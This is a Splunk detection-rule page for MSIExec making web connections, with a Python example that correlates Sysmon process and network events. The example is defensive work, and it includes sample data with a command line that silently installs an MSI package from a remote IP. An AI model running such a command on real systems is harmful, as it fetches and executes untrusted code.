Windows MSIExec With Network Connections

Splunk Security Content

Summary
This rule detects unusual network activity associated with MSIExec, the Windows Installer utility. Typically, MSIExec does not engage in network communications; thus, any instance where it is observed making connections over the common web ports 80 (HTTP) or 443 (HTTPS) is suspicious. The analytic combines process creation events gathered from Endpoint Detection and Response (EDR) agents with network traffic logs to identify such activity. This abnormal behavior is often indicative of malicious intent, such as downloading files or communicating with command and control servers, which can lead to significant security risks, including data exfiltration and further malware execution. The rule is based on the Sysmon events that record process creation (EventID 1) and network connections (EventID 3). It is essential to implement proper logging and mapping to the data model to ensure effective detection.
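The join the summary describes, written out as an added example (not Splunk's SPL and not part of the original page): constructed Sysmon-style EventID 1 and EventID 3 records are correlated on ProcessGuid, and a finding is raised only for an msiexec.exe process that initiated a connection to port 80 or 443. Field names follow Sysmon's, but the records, GUIDs and addresses are made up for the example.

```python
# Added example: join constructed Sysmon EventID 1 / EventID 3 records on ProcessGuid.
from typing import Dict, List

WEB_PORTS = {80, 443}

# Constructed sample events in a flattened Sysmon-like shape (not real telemetry).
SAMPLE_EVENTS: List[Dict] = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\explorer.exe",
     "CommandLine": "msiexec.exe /i C:\\Users\\u\\setup.msi /qn"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "ParentImage": "C:\\Windows\\System32\\cmd.exe",
     "CommandLine": "msiexec.exe /q /i http://203.0.113.10/pkg.msi"},
    {"EventID": 1, "ProcessGuid": "{C3}", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "ParentImage": "C:\\Windows\\explorer.exe", "CommandLine": "browser.exe"},
    {"EventID": 3, "ProcessGuid": "{B2}", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "DestinationIp": "203.0.113.10", "DestinationPort": 80, "Initiated": "true"},
    {"EventID": 3, "ProcessGuid": "{C3}", "Image": "C:\\Program Files\\Browser\\browser.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 443, "Initiated": "true"},
    {"EventID": 3, "ProcessGuid": "{A1}", "Image": "C:\\Windows\\System32\\msiexec.exe",
     "DestinationIp": "10.0.0.5", "DestinationPort": 445, "Initiated": "true"},
]


def detect_msiexec_network(events: List[Dict]) -> List[Dict]:
    """Flag each msiexec.exe-initiated connection to 80/443, joined on ProcessGuid
    to its EventID 1 record so parent and command line are available for triage."""
    creations = {e["ProcessGuid"]: e for e in events if e["EventID"] == 1}
    findings = []
    for e in events:
        if e["EventID"] != 3 or e.get("Initiated") != "true":
            continue  # only outbound connections the process itself opened
        if not e["Image"].lower().endswith("\\msiexec.exe"):
            continue
        if e["DestinationPort"] not in WEB_PORTS:
            continue
        proc = creations.get(e["ProcessGuid"], {})
        findings.append({
            "ProcessGuid": e["ProcessGuid"],
            "DestinationIp": e["DestinationIp"],
            "DestinationPort": e["DestinationPort"],
            # Parent and command line are what an analyst needs for triage, e.g. to
            # tell a URL-based /i install from an unexpected download.
            "ParentImage": proc.get("ParentImage", "<no EventID 1 seen>"),
            "CommandLine": proc.get("CommandLine", "<no EventID 1 seen>"),
        })
    return findings
```

In production the same join is expressed against the Endpoint and Network_Traffic data models, with the ProcessGuid join replacing the looser match on host and process name that would otherwise pair unrelated events.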
Categories
  • Windows
  • Endpoint
Data Sources
  • Process
  • Network Traffic
ATT&CK Techniques
  • T1218.007
Created: 2025-01-24